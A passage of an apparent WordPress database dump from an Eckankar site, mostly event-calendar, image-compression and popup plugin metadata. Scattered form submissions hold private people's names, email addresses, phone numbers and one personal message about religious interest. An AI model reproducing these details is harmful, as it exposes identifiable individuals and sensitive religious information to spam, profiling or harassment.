:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139417,264678,'boldgrid_hide_page_title','0'),(139435,264678,'_RTEClimitRegistrations','0'),(139403,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139405,264678,'_EventOrigin','events-calendar'),(139406,264678,'_EventOrigin','events-calendar'),(139407,264678,'_EventOrigin','events-calendar'),(139408,264678,'_EventOrigin','events-calendar'),(139409,264678,'_EventOrigin','events-calendar'),(139410,264678,'_EventOrigin','events-calendar'),(139411,264678,'_EventOrigin','events-calendar'),(139412,264678,'_EventOrigin','events-calendar'),(139413,264678,'_EventOrigin','events-calendar'),(139414,264678,'_EventOrigin','events-calendar'),(139415,264678,'_EventOrigin','events-calendar'),(139416,264678,'_thumbnail_id','264651'),(139404,264678,'_EventOrigin','events-calendar'),(139436,264678,'_RTECmaxRegistrations','30'),(139437,264678,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(139438,264678,'_RTECnumRegistered','0'),(139439,264678,'_EventVenueID','262435'),(139442,264678,'_dp_original','264650'),(139441,264678,'_oembed_c0ed44d4b4f8f387a25cfa556dceb09e','{{unknown}}'),(139443,264678,'_edit_lock','1620590946:2'),(139444,264678,'_edit_last','2'),(193696,269204,'_field_653','Allene839@outlook.com'),(193695,269204,'_field_652','Dotson'),(142650,265043,'original-file','2021/05/eck-soul-adv-2-updraft-pre-smush-original.png'),(142651,265043,'smush-complete','1'),(142652,265043,'smush-info','The file was compressed from 65.84 KB to 20.88 KB saving 68.29 percent using WP-Optimize'),(142653,265043,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:67423;s:12:\"smushed-size\";i:21380;s:15:\"savings-percent\";d:68.2900000000000062527760746888816356658935546875;}'),(143524,265134,'passster_activate_global_protection',NULL),(140854,264846,'data_version','3'),(140855,264846,'popup_open_count','0'),(140856,264846,'popup_conversion_count','0'),(144142,265217,'mec_fees','a:0:{}'),(144141,265217,'mec_fees_global_inheritance','1'),(144587,265247,'mec_start_time_minutes','0'),(144586,265247,'mec_start_time_ampm','PM'),(144585,265247,'mec_start_day_seconds','68400'),(144584,265247,'mec_end_date','2021-08-11'),(144583,265247,'mec_end_time_hour','8'),(144582,265247,'mec_end_time_minutes','0'),(144581,265247,'mec_end_time_ampm','PM'),(144580,265247,'mec_end_day_seconds','72000'),(144579,265247,'mec_repeat_status','0'),(144578,265247,'mec_repeat_type',''),(144577,265247,'mec_more_info',''),(144576,265247,'mec_read_more',''),(144575,265247,'mec_organizer_id','1'),(144572,265247,'mec_cost',''),(144573,265247,'mec_more_info_target','_self'),(144574,265247,'mec_more_info_title',''),(144571,265247,'mec_additional_location_ids','a:0:{}'),(144569,265247,'mec_currency','a:0:{}'),(144570,265247,'mec_additional_organizer_ids','a:0:{}'),(144433,265241,'mec_end_time_hour','8'),(144432,265241,'mec_end_time_minutes','0'),(144431,265241,'mec_end_time_ampm','PM'),(144430,265241,'mec_end_day_seconds','72000'),(144429,265241,'mec_repeat_status','0'),(144428,265241,'mec_repeat_type',''),(144427,265241,'mec_more_info',''),(144426,265241,'mec_read_more',''),(144425,265241,'mec_organizer_id','1'),(144424,265241,'mec_more_info_title',''),(144423,265241,'mec_more_info_target','_self'),(144422,265241,'mec_cost',''),(144421,265241,'mec_additional_location_ids','a:0:{}'),(144420,265241,'mec_additional_organizer_ids','a:0:{}'),(144482,265242,'original-file','2021/07/contemplation-water-color-1-updraft-pre-smush-original.jpg'),(144419,265241,'mec_currency','a:0:{}'),(144534,265244,'mec_ticket_variations','a:0:{}'),(144533,265244,'mec_reg_fields_global_inheritance','1'),(144532,265244,'mec_reg_fields','a:0:{}'),(144531,265244,'mec_bfixed_fields','a:0:{}'),(144530,265244,'mec_op','a:0:{}'),(144529,265244,'mec_fields','a:0:{}'),(144528,265244,'mec_event_status','EventScheduled'),(144526,265244,'mec_hide_time','0'),(144527,265244,'mec_hide_end_time','0'),(143561,265137,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93526;s:12:\"smushed-size\";i:88389;s:15:\"savings-percent\";d:5.4900000000000002131628207280300557613372802734375;}'),(143560,265137,'smush-complete','1'),(143562,265135,'original-file','2021/06/bookdisc-notext-2021-updraft-pre-smush-original.jpg'),(143563,265135,'smush-info','The file was compressed from 38.16 KB to 37.36 KB saving 2.09 percent using WP-Optimize'),(143565,265135,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39071;s:12:\"smushed-size\";i:38256;s:15:\"savings-percent\";d:2.089999999999999857891452847979962825775146484375;}'),(143564,265135,'smush-complete','1'),(143566,265140,'original-file','2021/06/sos-notext-2021-updraft-pre-smush-original.jpg'),(143567,265140,'smush-complete','1'),(143568,265140,'smush-info','The file was compressed from 78.21 KB to 75.16 KB saving 3.9 percent using WP-Optimize'),(143569,265140,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:80088;s:12:\"smushed-size\";i:76968;s:15:\"savings-percent\";d:3.899999999999999911182158029987476766109466552734375;}'),(143574,265142,'_wp_attached_file','2021/06/gold-waterfall-1.jpg'),(143575,265142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:465;s:6:\"height\";i:289;s:4:\"file\";s:28:\"2021/06/gold-waterfall-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"gold-waterfall-1-300x186.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"gold-waterfall-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"gold-waterfall-1-300x289.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"gold-waterfall-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"gold-waterfall-1-300x289.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"gold-waterfall-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143588,265142,'original-file','2021/06/gold-waterfall-1-updraft-pre-smush-original.jpg'),(143589,265142,'smush-complete','1'),(143590,265142,'smush-info','The file was compressed from 55.73 KB to 52.44 KB saving 5.91 percent using WP-Optimize'),(143591,265142,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:57066;s:12:\"smushed-size\";i:53696;s:15:\"savings-percent\";d:5.910000000000000142108547152020037174224853515625;}'),(143748,265162,'_field_448','linda.bowman613@comcast.net'),(143746,265162,'_field_446','Linda'),(143747,265162,'_field_447','Bowman'),(143745,265159,'passster_protection_type','password'),(143744,265159,'passster_activate_protection',NULL),(143743,265159,'passster_activate_global_protection',NULL),(144296,265229,'_field_370','5314665305'),(144294,265229,'_field_362','Gary'),(144295,265229,'_field_363','Zebrowski '),(143614,265148,'protect_children',''),(143615,265148,'_field_425','Test'),(143616,265148,'_field_426','Testreg'),(143617,265148,'_field_427','choll.03@comcast.net'),(143618,265148,'_form_id','46'),(143619,265148,'_seq_num','23'),(143632,265151,'protect_children',''),(143633,265151,'_field_402','Test2'),(143634,265151,'_field_403','Testing'),(143635,265151,'_field_404','choll.03@comcast.net'),(143636,265151,'_form_id','44'),(143637,265151,'_seq_num','2'),(143638,265152,'protect_children',''),(143639,265152,'_field_402','Test3'),(143640,265152,'_field_403','testing'),(143641,265152,'_field_404','choll.03@comcast.net'),(143642,265152,'_form_id','44'),(143643,265152,'_seq_num','3'),(143668,265158,'_field_312','Michael'),(143669,265158,'_field_313','Shank'),(143670,265158,'_field_333','9704334515'),(143671,265158,'_field_314','michaelshank2020@gmail.com'),(143672,265158,'_field_315','Spiritual journey '),(143673,265158,'_field_316','My name is Michael Shank, and a dear friend from middle Tennessee, Scott Zaft (his wife is the TN CFO for Eckankar), discussed his spiritual journey in Eckankar with me by phone yesterday. It feels like the path home. I’m very interested in meeting and getting more information at your earliest convenience. Thanks so much in advance. With love, Michael Shank'),(143674,265158,'_form_id','35'),(143675,265158,'_seq_num','44'),(143742,265159,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144471,265241,'mec_allday','0'),(144472,265241,'mec_certain_weekdays','a:0:{}'),(144473,265241,'mec_dont_show_map','0'),(144474,265241,'mec_location_id','118'),(144437,265241,'mec_start_time_minutes','0'),(144438,265241,'mec_public','1'),(144439,265241,'mec_start_date','2021-08-26'),(144440,265241,'mec_start_time_hour','7'),(144441,265241,'mec_countdown_method','global'),(144442,265241,'mec_timezone','global'),(144443,265241,'mec_comment',''),(144444,265241,'one_occurrence','0'),(144445,265241,'mec_hide_time','0'),(144446,265241,'mec_hide_end_time','0'),(144447,265241,'mec_event_status','EventScheduled'),(144448,265241,'mec_fields','a:0:{}'),(144449,265241,'mec_op','a:0:{}'),(144450,265241,'mec_bfixed_fields','a:0:{}'),(144451,265241,'mec_reg_fields','a:0:{}'),(144452,265241,'mec_reg_fields_global_inheritance','1'),(144453,265241,'mec_ticket_variations','a:0:{}'),(144454,265241,'mec_ticket_variations_global_inheritance','1'),(144455,265241,'mec_fees','a:0:{}'),(144456,265241,'mec_booking','a:0:{}'),(144457,265241,'mec_tickets','a:0:{}'),(144458,265241,'mec_fees_global_inheritance','1'),(144459,265241,'mec_hourly_schedules','a:0:{}'),(144460,265241,'mec_not_in_days',''),(144461,265241,'mec_in_days',''),(144462,265241,'mec_repeat_end_at_date',''),(144463,265241,'mec_advanced_days','a:0:{}'),(144464,265241,'passster_protection_type','password'),(144465,265241,'passster_activate_global_protection',NULL),(144466,265241,'passster_activate_protection',NULL),(144467,265241,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144481,265242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:644;s:6:\"height\";i:362;s:4:\"file\";s:39:\"2021/07/contemplation-water-color-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-300x362.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:362;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:39:\"contemplation-water-color-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144478,265241,'_edit_last','2'),(144479,265241,'_thumbnail_id','265242'),(144480,265242,'_wp_attached_file','2021/07/contemplation-water-color-1.jpg'),(144568,265247,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144567,265247,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144566,265247,'boldgrid_hide_page_title','0'),(144565,265247,'mec_display_cancellation_reason_in_single_page',''),(144564,265247,'mec_cancelled_reason',''),(144563,265247,'mec_moved_online_link',''),(144553,265244,'mec_certain_weekdays','a:0:{}'),(144551,265244,'mec_repeat_interval','1'),(144552,265244,'mec_allday','0'),(144536,265244,'mec_fees','a:0:{}'),(144535,265244,'mec_ticket_variations_global_inheritance','1'),(144524,265244,'mec_comment',''),(144525,265244,'one_occurrence','0'),(144512,265244,'mec_end_time_ampm','PM'),(144510,265244,'mec_repeat_status','0'),(144511,265244,'mec_end_day_seconds','72000'),(144499,265244,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-04\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-04\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144485,265242,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:82936;s:12:\"smushed-size\";i:78190;s:15:\"savings-percent\";d:5.71999999999999975131004248396493494510650634765625;}'),(144477,265241,'_edit_lock','1627162536:2'),(144476,265241,'protect_children',''),(144475,265241,'mec_color',''),(144470,265241,'mec_repeat_interval','1'),(144469,265241,'mec_repeat_end',''),(144468,265241,'mec_repeat_end_at_occurrences',''),(144436,265241,'mec_start_time_ampm','PM'),(144435,265241,'mec_start_day_seconds','68400'),(144434,265241,'mec_end_date','2021-08-26'),(143351,265122,'_field_446','NM'),(143352,265122,'_field_447','Narayanam'),(143308,265113,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:501;s:6:\"height\";i:278;s:4:\"file\";s:43:\"2021/06/2021-May-ESC-Seminar-2-EXTENDED.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-300x278.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-474x278.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-300x278.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"2021-May-ESC-Seminar-2-EXTENDED-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143307,265113,'_wp_attached_file','2021/06/2021-May-ESC-Seminar-2-EXTENDED.jpg'),(143305,265111,'_form_id','46'),(143306,265111,'_seq_num','20'),(143304,265111,'_field_427','glendagwatson@aol.com'),(143303,265111,'_field_426','Watson'),(143302,265111,'_field_425','Glenda'),(143285,265108,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:38604;s:12:\"smushed-size\";i:36989;s:15:\"savings-percent\";d:4.17999999999999971578290569595992565155029296875;}'),(143284,265108,'smush-info','The file was compressed from 37.70 KB to 36.12 KB saving 4.18 percent using WP-Optimize'),(143283,265108,'smush-complete','1'),(143282,265108,'original-file','2021/05/phon-1e-updraft-pre-smush-original.jpg'),(143311,265115,'_wp_attached_file','2021/06/2021-May-ESC-Seminar-2-EXTENDED-2.jpg'),(144484,265242,'smush-info','The file was compressed from 80.99 KB to 76.36 KB saving 5.72 percent using WP-Optimize'),(144483,265242,'smush-complete','1'),(144498,265244,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144497,265244,'boldgrid_hide_page_title','0'),(144496,265244,'mec_display_cancellation_reason_in_single_page',''),(144495,265244,'mec_cancelled_reason',''),(144494,265244,'mec_moved_online_link',''),(144493,265243,'_seq_num','130'),(144491,265243,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(144492,265243,'_form_id','21'),(144490,265243,'_field_228','US'),(144489,265243,'_field_227','CO'),(144509,265244,'mec_repeat_type',''),(144508,265244,'mec_more_info',''),(144507,265244,'mec_read_more',''),(144506,265244,'mec_organizer_id','1'),(144505,265244,'mec_more_info_title',''),(144504,265244,'mec_more_info_target','_self'),(144503,265244,'mec_cost',''),(144502,265244,'mec_additional_location_ids','a:0:{}'),(144501,265244,'mec_additional_organizer_ids','a:0:{}'),(144500,265244,'mec_currency','a:0:{}'),(144523,265244,'mec_timezone','global'),(144522,265244,'mec_countdown_method','global'),(144521,265244,'mec_start_time_hour','7'),(144518,265244,'mec_start_time_minutes','0'),(144519,265244,'mec_public','1'),(144520,265244,'mec_start_date','2021-08-04'),(144517,265244,'mec_start_time_ampm','PM'),(144516,265244,'mec_start_day_seconds','68400'),(144515,265244,'mec_end_date','2021-08-04'),(144513,265244,'mec_end_time_minutes','0'),(144514,265244,'mec_end_time_hour','8'),(144548,265244,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144547,265244,'passster_activate_protection',NULL),(144546,265244,'passster_activate_global_protection',NULL),(144545,265244,'passster_protection_type','password'),(144544,265244,'mec_advanced_days','a:0:{}'),(144541,265244,'mec_not_in_days',''),(144542,265244,'mec_in_days',''),(144543,265244,'mec_repeat_end_at_date',''),(144540,265244,'mec_hourly_schedules','a:0:{}'),(144539,265244,'mec_fees_global_inheritance','1'),(144538,265244,'mec_tickets','a:0:{}'),(144537,265244,'mec_booking','a:0:{}'),(140853,264846,'popup_settings','a:39:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:10:\"pum-264846\";s:5:\"delay\";i:500;}}}s:7:\"cookies\";a:1:{i:0;a:2:{s:5:\"event\";s:14:\"on_popup_close\";s:8:\"settings\";a:5:{s:4:\"name\";s:10:\"pum-264846\";s:3:\"key\";s:0:\"\";s:7:\"session\";b:0;s:4:\"time\";s:7:\"1 month\";s:4:\"path\";s:1:\"1\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:4:\"2085\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center 